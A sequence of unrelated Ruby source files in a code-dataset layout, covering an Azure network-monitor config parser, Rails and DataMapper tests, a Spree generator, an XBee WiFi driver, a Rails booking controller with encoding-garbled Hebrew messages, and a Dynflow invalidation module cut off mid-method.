_rule["NetworkThresholdLoss"] = _test["NetworkThreshold"].nil? ? "-3" : (_test["NetworkThreshold"].has_key?("Loss") ? _test["NetworkThreshold"]["Loss"] : "-2")
_rule["NetworkThresholdLatency"] = _test["NetworkThreshold"].nil? ? "-3.0" : (_test["NetworkThreshold"].has_key?("Latency") ? _test["NetworkThreshold"]["Latency"] : "-2.0")
_rule["ValidStatusCodeRanges"] = _test.has_key?["ValidStatusCodeRanges"] ? _test["ValidStatusCodeRanges"] : nil
_connectionMonitorId = _test.has_key?("ConnectionMonitorId") ? _test["ConnectionMonitorId"].to_s : String.new
# Iterate over ConnectionMonitorInfoMap to get following info
if !_connectionMonitorId.empty?
_cmMap = _h.has_key?(EpmCMInfoTag) ? _h[EpmCMInfoTag] : Hash.new
if !_cmMap.empty?
_cmId = _cmMap[_connectionMonitorId.to_s]
_rule["CMResourceId"] = _cmId["resourceId"]
_rule["IngestionWorkspaceId"] = _cmId["ingestionWorkspaceId"]
_rule["WorkspaceAlias"] = _cmId["workspaceAlias"]
end
end
# Collect endpoints details
_rule["Endpoints"] = []
# Get the list of endpoint ids
_endpoints = _test["Endpoints"]
_endpoints.each do |ep|
_endpointHash = Hash.new
_endpoint = _h[EpmEndpointInfoTag][ep]
_endpointHash["Id"] = ep
_endpointHash["Name"] = _endpoint.has_key?("name") ? _endpoint["name"] : String.new
_endpointHash["URL"] = _endpoint["url"]
_endpointHash["Port"] = _endpoint["port"]
_endpointHash["Protocol"] = _endpoint["protocol"]
_endpointHash["TimeDrift"] = getEndpointTimedrift(testId, ep, _test["Poll"], getWorkspaceId()) #TODO
_rule["Endpoints"].push(_endpointHash)
end
_epmRules["Rules"].push(_rule)
end
end
_epmRules
rescue JSON::ParserError => e
Logger::logError "Error in Json Parse in EPM data: #{e}", Logger::resc
raise "Got exception in EPM parsing: #{e}"
nil
end
end
def self.getWorkspaceId()
begin
_workspaceId = @metadata.has_key?("WorkspaceID") ? @metadata["WorkspaceID"] : String.new
return _workspaceId
end
end
def self.getEndpointTimedrift(testId, endpointId, monitoringInterval, workspaceId)
begin
hashString = testId + endpointId + workspaceId
monIntervalInSecs = monitoringInterval * 60
hashCode = getHashCode(hashString)
timeDrift = hashCode % monIntervalInSecs
return timeDrift.to_s
end
end
def self.getHashCode(str)
result = 0
mul = 1
max_mod = 2**31 - 1
str.chars.reverse_each do |c|
result += mul * c.ord
result %= max_mod
mul *= 31
end
result
end
def self.getERHashFromJson(text)
begin
_h = JSON.parse(text)
_agentId = getCurrentAgentId()
if _agentId.empty?
return nil
else
_erRules = {"PrivatePeeringRules" => [], "MSPeeringRules" => []}
# Iterate over OnPrem and Azure Agent Lists to check if this agent is part of this test
_privateTestMap = _h[ERPrivatePeeringInfoTag]
_microsoftTestMap = _h[ERMSPeeringInfoTag]
_circuitIdMap = _h[ERCircuitInfoTag]
if _privateTestMap.empty? && _microsoftTestMap.empty?
Logger::logInfo "ER configuration is not present"
end
# Private Peering Rules
if !_privateTestMap.empty?
_privateTestMap.each do |key, value|
# Get list of onPremAgents in this test
_isAgentPresent = false
_privateRule = Hash.new
_onPremAgents = value["onPremAgents"]
_onPremAgents.each do |x|
if x == _agentId
# Append this test to ER Config
_isAgentPresent = true
_privateRule = getERPrivateRuleFromUIConfig(key, value, _circuitIdMap)
break;
end
end
if !_isAgentPresent
_azureAgents = value["azureAgents"]
_azureAgents.each do |x|
if x == _agentId
_isAgentPresent = true
_privateRule = getERPrivateRuleFromUIConfig(key, value, _circuitIdMap)
break;
end
end
end
if !_privateRule.empty?
_erRules["PrivatePeeringRules"].push(_privateRule)
end
end
end
# MS Peering Rules
if !_microsoftTestMap.empty?
_microsoftTestMap.each do |key, value|
_microsoftRule = Hash.new
_onPremAgents = value["onPremAgents"]
_onPremAgents.each do |x|
if x == _agentId
# Append this test to ER Config
_isAgentPresent = true
_microsoftRule = getERMicrosoftRuleFromUIConfig(key, value, _circuitIdMap)
break;
end
end
if !_microsoftRule.empty?
_erRules["MSPeeringRules"].push(_microsoftRule)
end
end
end
_erRules
end
rescue JSON::ParserError => e
Logger::logError "Error in Json Parse in ER data: #{e}", Logger::resc
nil
end
end
def self.getERPrivateRuleFromUIConfig(key, value, _circuitIdMap)
_ruleHash = Hash.new
_ruleHash["Name"] = key
_ruleHash["Protocol"] = value["protocol"]
_ruleHash["CircuitId"] = value["circuitId"]
_ruleHash["LossThreshold"] = (!value["threshold"].nil? and value["threshold"].has_key?("loss")) ? value["threshold"]["loss"] : "-2"
_ruleHash["LatencyThreshold"] = (!value["threshold"].nil? and value["threshold"].has_key?("latency")) ? value["threshold"]["latency"] : "-2.0"
_ruleHash["CircuitName"] = value["circuitName"]
_ruleHash["vNetName"]= value["vNet"]
_ruleHash["ConnectionResourceId"]= value["connectionResourceId"]
_ruleHash["CircuitResourceId"] = _circuitIdMap[value["circuitId"]]
_ruleHash["OnPremAgents"] = value["onPremAgents"]
_ruleHash["AzureAgents"] = value["azureAgents"]
return _ruleHash
end
def self.getERMicrosoftRuleFromUIConfig(key, value, _circuitIdMap)
_ruleHash = Hash.new
_ruleHash["Name"] = key
_ruleHash["CircuitName"] = value["circuitName"]
_ruleHash["CircuitId"] = value["circuitId"]
_ruleHash["Protocol"] = value["protocol"]
_ruleHash["CircuitResourceId"] = _circuitIdMap[value["circuitId"]]
_ruleHash["LossThreshold"] = (!value["threshold"].nil? and value["threshold"].has_key?("loss")) ? value["threshold"]["loss"] : "-2"
_ruleHash["LatencyThreshold"] = (!value["threshold"].nil? and value["threshold"].has_key?("latency")) ? value["threshold"]["latency"] : "-2.0"
_ruleHash["UrlList"] = value["urlList"]
_ruleHash["OnPremAgents"] = value["onPremAgents"]
return _ruleHash
end
end
# Only function needed to be called from this module
def self.GetAgentConfigFromUIConfig(uiXml)
_uiHash = UIConfigParser.parse(uiXml)
AgentConfigCreator.resetErrorCheck()
_agentJson = AgentConfigCreator.createJsonFromUIConfigHash(_uiHash)
_errorStr = AgentConfigCreator.getErrorSummary()
return _agentJson, _errorStr
end
end
# NPM Contracts verification for data being uploaded
module NPMContract
DATAITEM_AGENT = "agent"
DATAITEM_PATH = "path"
DATAITEM_DIAG = "diagnostics"
DATAITEM_ENDPOINT_HEALTH = "endpointHealth"
DATAITEM_ENDPOINT_MONITORING = "endpointMonitoringData"
DATAITEM_ENDPOINT_DIAGNOSTICS = "endpointDiagnostics"
DATAITEM_EXROUTE_MONITORING = "expressrouteMonitoringData"
DATAITEM_CONNECTIONMONITOR_TEST = "connectionMonitorTestResult"
DATAITEM_CONNECTIONMONITOR_PATH = "connectionMonitorPathData"
DATAITEM_AGENT_DIAGNOSTICS = "agentDiagnostics"
DATAITEM_VALID = 1
DATAITEM_ERR_INVALID_FIELDS = 2
DATAITEM_ERR_INVALID_TYPE = 3
CONTRACT_AGENT_DATA_KEYS = ["AgentFqdn",
"AgentIP",
"AgentCapability",
"SubnetId",
"PrefixLength",
"AddressType",
"SubType",
"TimeGenerated",
"OSType",
"NPMAgentEnvironment"]
CONTRACT_AGENT_DIAGNOSTICS_KEYS = ["SubType",
"TimeGenerated",
"NotificationCode",
"NotificationType",
"Computer"]
CONTRACT_PATH_DATA_KEYS = ["SourceNetwork",
"SourceNetworkNodeInterface",
"SourceSubNetwork",
"DestinationNetwork",
"DestinationNetworkNodeInterface",
"DestinationSubNetwork",
"RuleName",
"TimeSinceActive",
"LossThreshold",
"LatencyThreshold",
"LossThresholdMode",
"LatencyThresholdMode",
"SubType",
"HighLatency",
"MedianLatency",
"LowLatency",
"LatencyHealthState",
"Loss",
"LossHealthState",
"Path",
"Computer",
"TimeGenerated",
"Protocol",
"MinHopLatencyList",
"MaxHopLatencyList",
"AvgHopLatencyList",
"TraceRouteCompletionTime"]
CONTRACT_DIAG_DATA_KEYS = ["SubType",
"Message"]
CONTRACT_ENDPOINT_HEALTH_DATA_KEYS = ["SubType",
"TestName",
"ServiceTestId",
"ConnectionMonitorResourceId",
"Target",
"Port",
"EndpointId",
"Protocol",
"TimeSinceActive",
"ServiceResponseTime",
"ServiceLossPercent",
"ServiceLossHealthState",
"ServiceResponseHealthState",
"ResponseCodeHealthState",
"ServiceResponseThresholdMode",
"ServiceResponseThreshold",
"ServiceResponseCode",
"Loss",
"LossHealthState",
"LossThresholdMode",
"LossThreshold",
"NetworkTestEnabled",
"MedianLatency",
"HighLatency",
"LowLatency",
"LatencyThresholdMode",
"LatencyThreshold",
"LatencyHealthState",
"TimeGenerated",
"Computer"]
CONTRACT_ENDPOINT_PATH_DATA_KEYS = ["SubType",
"TestName",
"ServiceTestId",
"ConnectionMonitorResourceId",
"Target",
"Port",
"TimeSinceActive",
"EndpointId",
"SourceNetworkNodeInterface",
"DestinationNetworkNodeInterface",
"Path",
"Loss",
"NetworkTestEnabled",
"HighLatency",
"MedianLatency",
"LowLatency",
"LossHealthState",
"LatencyHealthState",
"LossThresholdMode",
"LossThreshold",
"LatencyThresholdMode",
"LatencyThreshold",
"Computer",
"Protocol",
"MinHopLatencyList",
"MaxHopLatencyList",
"AvgHopLatencyList",
"TraceRouteCompletionTime",
"TimeGenerated"]
CONTRACT_ENDPOINT_DIAG_DATA_KEYS = ["SubType",
"TestName",
"ServiceTestId",
"ConnectionMonitorResourceId",
"Target",
"NotificationCode",
"EndpointId",
"TimeGenerated",
"Computer"]
CONTRACT_EXROUTE_MONITOR_DATA_KEYS = ["SubType",
"TimeGenerated",
"Circuit",
"ComputerEnvironment",
"vNet",
"Target",
"PeeringType",
"CircuitResourceId",
"ConnectionResourceId",
"Path",
"SourceNetworkNodeInterface",
"DestinationNetworkNodeInterface",
"Loss",
"HighLatency",
"MedianLatency",
"LowLatency",
"LossHealthState",
"LatencyHealthState",
"RuleName",
"TimeSinceActive",
"LossThreshold",
"LatencyThreshold",
"LossThresholdMode",
"LatencyThresholdMode",
"Computer",
"Protocol",
"MinHopLatencyList",
"MaxHopLatencyList",
"AvgHopLatencyList",
"TraceRouteCompletionTime",
"DiagnosticHop",
"DiagnosticHopLatency"]
CONTRACT_CONNECTIONMONITOR_TEST_RESULT_KEYS = ["SubType",
"RecordId",
"Computer",
"ConnectionMonitorResourceId",
"TimeCreated",
"TestGroupName",
"TestConfigurationName",
"SourceType",
"SourceResourceId",
"SourceAddress",
"SourceName",
"SourceAgentId",
"DestinationType",
"DestinationResourceId",
"DestinationAddress",
"DestinationName",
"DestinationAgentId",
"Protocol",
"DestinationPort",
"DestinationIP",
"ChecksTotal",
"ChecksFailed",
"ChecksFailedPercentThreshold",
"RoundTripTimeMsThreshold",
"MinRoundTripTimeMs",
"MaxRoundTripTimeMs",
"AvgRoundTripTimeMs",
"TestResult",
"AdditionalData",
"IngestionWorkspaceResourceId"]
CONTRACT_CONNECTIONMONITOR_PATH_DATA_KEYS = ["SubType",
"RecordId",
"Computer",
"TopologyId",
"ConnectionMonitorResourceId",
"TimeCreated",
"TestGroupName",
"TestConfigurationName",
"SourceType",
"SourceResourceId",
"SourceAddress",
"SourceName",
"SourceAgentId",
"DestinationType",
"DestinationResourceId",
"DestinationAddress",
"DestinationName",
"DestinationAgentId",
"ChecksTotal",
"ChecksFailed",
"ChecksFailedPercentThreshold",
"RoundTripTimeMsThreshold",
"MinRoundTripTimeMs",
"MaxRoundTripTimeMs",
"AvgRoundTripTimeMs",
"HopAddresses",
"HopTypes",
"HopLinkTypes",
"HopResourceIds",
"Issues",
"Hops",
"DestinationPort",
"Protocol",
"PathTestResult",
"AdditionalData",
"IngestionWorkspaceResourceId"]
def self.IsValidDataitem(item, itemType)
_contract=[]
if itemType == DATAITEM_AGENT
_contract = CONTRACT_AGENT_DATA_KEYS
elsif itemType == DATAITEM_PATH
_contract = CONTRACT_PATH_DATA_KEYS
elsif itemType == DATAITEM_DIAG
_contract = CONTRACT_DIAG_DATA_KEYS
elsif itemType == DATAITEM_ENDPOINT_HEALTH
_contract = CONTRACT_ENDPOINT_HEALTH_DATA_KEYS
elsif itemType == DATAITEM_ENDPOINT_MONITORING
_contract = CONTRACT_ENDPOINT_PATH_DATA_KEYS
elsif itemType == DATAITEM_ENDPOINT_DIAGNOSTICS
_contract = CONTRACT_ENDPOINT_DIAG_DATA_KEYS
elsif itemType == DATAITEM_EXROUTE_MONITORING
_contract = CONTRACT_EXROUTE_MONITOR_DATA_KEYS
elsif itemType == DATAITEM_CONNECTIONMONITOR_TEST
_contract = CONTRACT_CONNECTIONMONITOR_TEST_RESULT_KEYS
elsif itemType == DATAITEM_CONNECTIONMONITOR_PATH
_contract = CONTRACT_CONNECTIONMONITOR_PATH_DATA_KEYS
elsif itemType == DATAITEM_AGENT_DIAGNOSTICS
_contract = CONTRACT_AGENT_DIAGNOSTICS_KEYS
end
return DATAITEM_ERR_INVALID_TYPE, nil if _contract.empty?
item.keys.each do |k|
return DATAITEM_ERR_INVALID_FIELDS, k if !_contract.include?(k)
end
return DATAITEM_VALID, nil
end
end
| 47.270609 | 213 | 0.44317 |
2623a9dafb063ce5a6329e223cc4979f615d95c4 | 1,204 | ENV["RAILS_ENV"] = "test"
require File.expand_path('../../config/environment', __FILE__)
require 'rails/test_help'
class ActiveSupport::TestCase
fixtures 'gallery/galleries', 'gallery/photos'
include ActionDispatch::TestProcess
def setup
reset_config
end
# resetting default configuration
def reset_config
ComfyGallery.configure do |config|
config.upload_options = { }
config.admin_controller = 'ApplicationController'
config.form_builder = 'ComfyGallery::FormBuilder'
end
end
# Example usage:
# assert_has_errors_on( @record, [:field_1, :field_2] )
# assert_has_errors_on( @record, {:field_1 => 'Message1', :field_2 => 'Message 2'} )
def assert_has_errors_on(record, fields)
fields = [fields].flatten unless fields.is_a?(Hash)
fields.each do |field, message|
assert record.errors.to_hash.has_key?(field.to_sym), "#{record.class.name} should error on invalid #{field}"
if message && record.errors[field].is_a?(Array) && !message.is_a?(Array)
assert_not_nil record.errors[field].index(message)
elsif message
assert_equal message, record.errors[field]
end
end
end
end
| 30.871795 | 114 | 0.687708 |
f8c32c193b80d57c89676382fc62fc5945b40288 | 1,898 | require 'spec_helper'
describe "1:1 (PK subset FK)" do
before(:all) do
class ::Person
include DataMapper::Resource
extend ConstraintSupport
property :id, Serial, :key => true
property :audit_id, Integer, :key => true, :min => 0
property :name, String, :required => true
has 1, :membership, constraint(:destroy)
end
class ::Membership
include DataMapper::Resource
# keep properties unordered
property :person_audit_id, Integer, :key => false, :min => 0, :unique => :person
property :person_id, Integer, :key => true, :min => 0, :unique => :person
property :role, String, :required => true
belongs_to :person
end
DataMapper.auto_migrate!
end
before(:each) do
Membership.all.destroy!
Person.all.destroy!
end
describe "Person.accepts_nested_attributes_for(:membership)" do
before(:all) do
Person.accepts_nested_attributes_for :membership
end
it "should allow to update an existing membership via Person#membership_attributes" do
person1 = Person.create(:id => 1, :audit_id => 10, :name => 'Martin')
Membership.create(:person => person1, :role => 'maintainer')
person1.reload
person2 = Person.create(:id => 2, :audit_id => 20, :name => 'John')
Membership.create(:person => person2, :role => 'contributor')
person2.reload
Person.all.size.should == 2
Membership.all.size.should == 2
person1.membership_attributes = { :role => 'tester' }
person1.save.should be_true
Person.all.map { |p| [p.id, p.audit_id, p.name] }.should == [
[1, 10, 'Martin'],
[2, 20, 'John'],
]
Membership.all.map { |m| [m.person_id, m.person_audit_id, m.role] }.should == [
[1, 10, 'tester'],
[2, 20, 'contributor'],
]
end
end
end
| 28.757576 | 90 | 0.603793 |
ac94c67fa5e27372b58a56910ab0ea01948f9277 | 620 | module SpreeUserProfile
module Generators
class InstallGenerator < Rails::Generators::Base
class_option :migrate, type: :boolean, default: true
def add_migrations
run 'bundle exec rake railties:install:migrations FROM=spree_user_profile'
end
def run_migrations
run_migrations = options[:migrate] || ['', 'y', 'Y'].include?(ask('Would you like to run the migrations now? [Y/n]'))
if run_migrations
run 'bundle exec rails db:migrate'
else
puts 'Skipping rails db:migrate, don\'t forget to run it!'
end
end
end
end
end
| 29.52381 | 125 | 0.645161 |
7974bd4e86b259c27352e810316524e5b73e8ee1 | 2,044 | require 'rubygems/test_case'
require "rubygems/text"
class TestGemText < Gem::TestCase
include Gem::Text
def test_format_text
assert_equal "text to\nwrap", format_text("text to wrap", 8)
end
def test_format_text_indent
assert_equal " text to\n wrap", format_text("text to wrap", 8, 2)
end
def test_format_text_none
assert_equal "text to wrap", format_text("text to wrap", 40)
end
def test_format_text_none_indent
assert_equal " text to wrap", format_text("text to wrap", 40, 2)
end
def test_format_text_trailing # for two spaces after .
text = <<-TEXT
This line is really, really long. So long, in fact, that it is more than eighty characters long! The purpose of this line is for testing wrapping behavior because sometimes people don't wrap their text to eighty characters. Without the wrapping, the text might not look good in the RSS feed.
TEXT
expected = <<-EXPECTED
This line is really, really long. So long, in fact, that it is more than
eighty characters long! The purpose of this line is for testing wrapping
behavior because sometimes people don't wrap their text to eighty characters.
Without the wrapping, the text might not look good in the RSS feed.
EXPECTED
assert_equal expected, format_text(text, 78)
end
def test_levenshtein_distance_add
assert_equal 2, levenshtein_distance("zentest", "zntst")
assert_equal 2, levenshtein_distance("zntst", "zentest")
end
def test_levenshtein_distance_empty
assert_equal 5, levenshtein_distance("abcde", "")
assert_equal 5, levenshtein_distance("", "abcde")
end
def test_levenshtein_distance_remove
assert_equal 3, levenshtein_distance("zentest", "zentestxxx")
assert_equal 3, levenshtein_distance("zentestxxx", "zentest")
end
def test_levenshtein_distance_replace
assert_equal 2, levenshtein_distance("zentest", "ZenTest")
assert_equal 7, levenshtein_distance("xxxxxxx", "ZenTest")
assert_equal 7, levenshtein_distance("zentest", "xxxxxxx")
end
end
| 34.644068 | 294 | 0.744618 |
5debc08d18aaa4222f5d9ac81c1962b763b60b50 | 134 | class AddMultipleToProject < ActiveRecord::Migration
def change
add_column :projects, :multiple, :decimal, default: 1
end
end
| 22.333333 | 57 | 0.761194 |
2847e6f26608ef9f39ae62af24ec75d9327f22f4 | 4,373 | #
# PlatoDevice::XBeeWifi class
#
module PlatoDevice
class XBeeWiFi < Plato::WiFi
include Plato
CR = "\r"
TMO_RESPONSE = 2000
@@wifi = nil
@@resolv = {}
def initialize
super
@wifi = Plato::Serial.open(9600, 8, 1, 1, :none)
end
def self.open
@@wifi = self.new unless @@wifi
@@wifi
end
def config(sw=nil)
if sw
bt = Plato::ButtonSwitch.new(sw)
tmo = Machine.millis + 1000
while tmo > Machine.millis
if bt.on?
XBeeWiFiConfig.new(self).menu
break
end
Machine.delay(1)
end
end
self
end
def atcmd(cmds, tmo=2000)
cmds = [cmds] unless cmds.instance_of?(Array)
rsp = []
begin
enter_at_mode
cmds.each {|c|
rsp << cmd(c, tmo)
}
cmd "ATCN"
# rsp = rsp[0] if rsp.size == 1
rescue
end
return rsp.size <= 1 ? rsp[0] : rsp
end
def cmd(c, tmo=2000)
self.write "#{c}#{CR}"
wait_cr tmo
end
def _write(c); @wifi._write(c); end
def _read; @wifi._read; end
def available; @wifi.available; end
def flush; @wifi.flush; end
def close
if @wifi
atcmd ["ATDL0.0.0.0", "ATDE0"]
# @wifi.close # disable enzi debug message
# @wifi = nil
end
end
# Wait for CR reception, copy from zigbee
def wait_cr(tmo=nil)
tmo += Machine.millis if tmo
s = ""
while true
c = @wifi.getc
return s if c == CR
if c
s << c
else
raise "XBee-wifi response timeout #{s}" if tmo && tmo <= Machine.millis
Machine.delay(1)
end
end
end
# Enter AT command mode
def enter_at_mode
while gets.size > 0; end # discard remain data
Machine.delay(1000) # wait 1 second
10.times do
begin
self.write '+++'
Machine.delay(1000) # wait 1 second
rsp = wait_cr(TMO_RESPONSE)
return rsp
rescue => e
end
end
raise "Cannot enter AT mode"
end
# get XBee WiFi status (association indicator)
def status
sts = atcmd "ATAI"
sts.to_i(16)
end
# wait for connection to AP
def wait_connect(trycnt=10)
trycnt.times do
case sts = status
when 0x00; return
when 0x23; raise "SSID not configured"
when 0x24; raise "Encryption key invalid"
when 0x27; raise "SSID was found, but join failed"
# else; Object.puts "status = 0x#{sts.to_s(16)}"
end
end
raise "Cannot connect to target"
end
# connect to destination
def connect(dest, port=80)
@dest = dest
@port = port
atcmd ["ATDL#{@dest}", "ATDE#{@port.to_s(16)}"]
wait_connect
end
# get ip address
def ip_address
atcmd "ATMY"
end
# get mac address
def mac_address
rsp = atcmd ["ATSH", "ATSL"]
return ('0' * 3 + rsp[0])[-4, 4] + ('0' * 7 + rsp[1])[-8, 8]
end
# ping command
def ping(ip)
atcmd "ATPG#{ip}", 5000
end
# DNS Lookup
def dns_lookup(fqdn)
rsp = @@resolv[fqdn]
# Object.puts "#{fqdn}: #{rsp}" if rsp
return rsp if rsp
addr = atcmd "ATLA#{fqdn}", 15000
if addr == 'ERROR' || !IPSocket.valid_address?(addr)
raise "#{fqdn} not provided"
end
# Object.puts "#{fqdn}: #{addr}"
@@resolv[fqdn] = addr
end
# reset network
def reset
atcmd "ATNR", 3000
end
# scan for access points
def scan_ap
enter_at_mode
self.write "ATAS#{CR}"
ap = []
loop {
sc = wait_cr 3000 # scan type
break if !sc || sc.size == 0 || sc == 'ERROR'
ch = wait_cr # channel number
st = wait_cr # security type ('00':open, '01':WPA, '02':WPA2, '03':WEP)
lm = wait_cr # Link margin
id = wait_cr # SSID
sec_type = case st
when '00'; :none
when '01'; :wpa
when '02'; :wpa2
when '03'; :wep
else; nil
end
ap << [id, sec_type] # ssid, sec_type
}
cmd "ATCN"
return ap
end
# set resolver
def self.setaddress(fqdn, addr)
@@resolv[fqdn] = addr
end
end
end
| 22.425641 | 84 | 0.515436 |
6a198f07333dab3ec0e22175c9adf3963c82e016 | 770 | default['chef']['user'] = 'chef'
default['chef']['group'] = 'chef'
default['chef']['home'] = '/home/chef'
default['chef']['root'] = '/var/chef-solo'
default['chef']['shell'] = '/bin/bash'
default['chef']['repo'] = "#{node['chef']['home']}/repo"
# update every 2 hours.
default['update']['minute'] = '0'
default['update']['hour'] = '1,3,5,7,9,11,13,15,17,19,21,23'
default['update']['day'] = '*'
default['update']['weekday'] = '*'
# reboot every night.
default['reboot']['time'] = '5:30'
# git checkout information.
default['git']['branch'] = 'master'
default['git']['repo'] = 'https://github.com/uccs-se/chef-repo'
default['git']['revision'] = 'HEAD'
default['git']['depth'] = 1
default['git']['retries'] = 3
default['git']['delay'] = 300
| 30.8 | 67 | 0.580519 |
e89987df7674ed53abae7294b76ca25192019ea7 | 812 | module JekyllPatternbot
class LayoutsFinder
def base
{
:name => false,
:description => false,
}
end
def info
layouts_dir = File.expand_path Config['layouts_dir']
layouts = []
return layouts unless File.directory? layouts_dir
layout_files = FileHelper.list_files_with_ext layouts_dir, '*'
for layout in layout_files
layout_data = base.clone
layout_data[:name] = File.basename layout, '.*'
unless Config['patternbot']['layouts'].nil?
Config['patternbot']['layouts'].each do |key, desc|
if key == layout_data[:name]
layout_data[:description] = desc.strip if desc
end
end
end
layouts.push layout_data
end
layouts
end
end
end
| 24.606061 | 68 | 0.58867 |
21bed3f89f68ab96d49f547752d84a8278d1cec6 | 4,748 | # -*- coding: utf-8 -*-
class HomeController < ApplicationController
require 'timeout'
MAIL_TYPES = {
:registration => 0,
:confirmation => 1,
:failure => 2,
:response_pending => 3
}
def index
flash[:error] = nil
flash[:notice] = nil
if user_signed_in?
@user = User.find(current_user.id)
end
@request = Request.new
@regions = Region.all
@room_types = RoomType.all
@room_porperties = RoomProperty.all
end
def create
flash[:error] = nil
flash[:notice] = nil
params[:request][:start_date] = DateTime.strptime(params[:request][:start_date], "%d/%m/%Y").to_time()
params[:request][:end_date] = DateTime.strptime(params[:request][:end_date], "%d/%m/%Y").to_time()
if params[:request][:price_from].empty?
params[:request][:price_from] = 0
end
if params[:request][:price_to].empty?
params[:request][:price_to] = 0
end
@regions = Region.all
@room_types = RoomType.all
@room_porperties = RoomProperty.all
@request = Request.new(params[:request])
if !user_signed_in?
@user = User.find(:all, :conditions => {:email => params[:user][:email]}).first
if !@user
#assword_length = 6
#password = Devise.friendly_token.first(password_length)
password = generate_activation_code()
params[:user][:password] = password
params[:user][:password_confirmation] = password
@user = User.new(params[:user])
if @user.save
#send_mail @user, MAIL_TYPES[:registration]
else
#send_mail @user, MAIL_TYPES[:failure]
end
else
@user.first_name = params[:user][:first_name]
@user.last_name = params[:user][:last_name]
@user.phone = params[:user][:phone]
if @user.save
#send_mail @user, MAIL_TYPES[:confirmation], @request
else
#send_mail @user, MAIL_TYPES[:failure]
end
end
@request.user = @user
else
@user = User.find(current_user.id)
@user.update_attributes(params[:user])
end
@request.status = 1 #1 = pending TODO: add constants for status
if @request.save
#@request.room_porperties_id = @request.id #this line is not needed, tables are based on has_and_belongs_to_many
request_room_porperty_list = params[:room_porperty_request][:list]
request_room_porperty_list.each do |prop_id|
if prop_id != ""
@request.room_properties << RoomProperty.find(prop_id.to_i)
end
end
if @request.save
@sites_counter = 0
matched_sites = Site.where(:region_id => params[:request][:region_id], :room_type_id => params[:request][:room_type_id])
matched_sites.each do |site|
site.room_properties = []
site.site_properties.each do |site_prop|
site.room_properties << RoomProperty.find(site_prop.room_property_id)
end
if is_array_included(@request.room_properties, site.room_properties)
@sites_counter += 1
@request.responses << Response.new( :site_id => site.id)
send_mail @user, MAIL_TYPES[:response_pending], @request, site
end
end
if @sites_counter > 0
send_mail @user, MAIL_TYPES[:confirmation], @request, nil, password
render 'request_confirmation'
else
flash[:error] = "ืื ื ืืฆืื ืฆืืืจืื ืืขืื ืื ืืืจืืฉืชื! ืื ื ืฉื ื ืืช ืืืคืืื ื ืืืืคืืฉ ืฉืื ืื ืกื ืฉืื."
render :index
end
else
#TODO: add error which indicates that room properties doesn't saved! --> return render :text => "save failed!!! errors: #{@request.errors.inspect}"
render :index
end
else
#TODO: add error which indicates that request doesn't saved! --> return render :text => "save failed!!! errors: #{@request.errors.inspect}"
render :index
end
end
private
def is_array_included arr_1, arr_2
(arr_1 - arr_2).size == 0
end
def send_mail user, type, request = nil, site = nil, password = nil
#begin
#status = Timeout::timeout(4) {
case type
when MAIL_TYPES[:registration]
UserMailer.registration_confirmation(user).deliver
when MAIL_TYPES[:confirmation]
UserMailer.request_confirmation(user, request, password).deliver
when MAIL_TYPES[:failure]
UserMailer.failure(user).deliver
when MAIL_TYPES[:response_pending]
UserMailer.response_pending(request, site).deliver
else
end
#}
#rescue
#end
end
def generate_activation_code(size = 6)
charset = %w{ 2 3 4 6 7 9 A C D E F G H J K M N P Q R T V W X Y Z}
(0...size).map{ charset.to_a[rand(charset.size)] }.join
end
end
| 32.081081 | 152 | 0.628054 |
187eb9bb1681fefd6584fcb2009723bdd636dc6a | 421 | require 'spec_helper'
describe SlackGamebot::Commands::Default do
let!(:team) { Team.first || Fabricate(:team) }
let(:app) { SlackGamebot::Server.new(team: team) }
it 'default' do
expect(message: SlackRubyBot.config.user).to respond_with_slack_message(SlackGamebot::ASCII)
end
it 'upcase' do
expect(message: SlackRubyBot.config.user.upcase).to respond_with_slack_message(SlackGamebot::ASCII)
end
end
| 32.384615 | 103 | 0.748219 |
5d8b8904502bc80780570ceeaa7c1e933c5c3693 | 424 | # frozen_string_literal: true
class NewMergeRequestWorker
include ApplicationWorker
include NewIssuable
def perform(merge_request_id, user_id)
return unless objects_found?(merge_request_id, user_id)
EventCreateService.new.open_mr(issuable, user)
NotificationService.new.new_merge_request(issuable, user)
issuable.create_cross_references!(user)
end
def issuable_class
MergeRequest
end
end
| 22.315789 | 61 | 0.79717 |
03a47cb050ac5b5fd6a872bc50145e3793c46935 | 6,793 | module Dynflow
class World
module Invalidation
# Invalidate another world, that left some data in the runtime,
# but it's not really running
#
# @param world [Coordinator::ClientWorld, Coordinator::ExecutorWorld] coordinator record
# left behind by the world we're trying to invalidate
# @return [void]
def invalidate(world)
Type! world, Coordinator::ClientWorld, Coordinator::ExecutorWorld
coordinator.acquire(Coordinator::WorldInvalidationLock.new(self, world)) do
coordinator.find_locks(class: Coordinator::PlanningLock.name,
owner_id: 'world:' + world.id).each do |lock|
invalidate_planning_lock lock
end
if world.is_a? Coordinator::ExecutorWorld
old_execution_locks = coordinator.find_locks(class: Coordinator::ExecutionLock.name,
owner_id: "world:#{world.id}")
coordinator.deactivate_world(world)
old_execution_locks.each do |execution_lock|
invalidate_execution_lock(execution_lock)
end
end
coordinator.delete_world(world)
end
end
def invalidate_planning_lock(planning_lock)
with_valid_execution_plan_for_lock(planning_lock) do |plan|
plan.steps.values.each { |step| invalidate_step step }
state = plan.plan_steps.all? { |step| step.state == :success } ? :planned : :stopped
plan.update_state(state)
coordinator.release(planning_lock)
execute(plan.id) if plan.state == :planned
end
end
# Invalidate an execution lock, left behind by a executor that
# was executing an execution plan when it was terminated.
#
# @param execution_lock [Coordinator::ExecutionLock] the lock to invalidate
# @return [void]
def invalidate_execution_lock(execution_lock)
with_valid_execution_plan_for_lock(execution_lock) do |plan|
plan.steps.values.each { |step| invalidate_step step }
plan.execution_history.add('terminate execution', execution_lock.world_id)
plan.update_state(:paused, history_notice: false) if plan.state == :running
plan.save
coordinator.release(execution_lock)
if plan.error?
new_state = plan.prepare_for_rescue
execute(plan.id) if new_state == :running
else
if coordinator.find_worlds(true).any? # Check if there are any executors
client_dispatcher.tell([:dispatch_request,
Dispatcher::Execution[execution_lock.execution_plan_id],
execution_lock.client_world_id,
execution_lock.request_id])
end
end
end
rescue Errors::PersistenceError
logger.error "failed to write data while invalidating execution lock #{execution_lock}"
end
# Tries to load an execution plan using id stored in the
# lock. If the execution plan cannot be loaded or is invalid,
# the lock is released. If the plan gets loaded successfully, it
# is yielded to a given block.
#
# @param execution_lock [Coordinator::ExecutionLock] the lock for which we're trying
# to load the execution plan
# @yieldparam [ExecutionPlan] execution_plan the successfully loaded execution plan
# @return [void]
def with_valid_execution_plan_for_lock(execution_lock)
begin
plan = persistence.load_execution_plan(execution_lock.execution_plan_id)
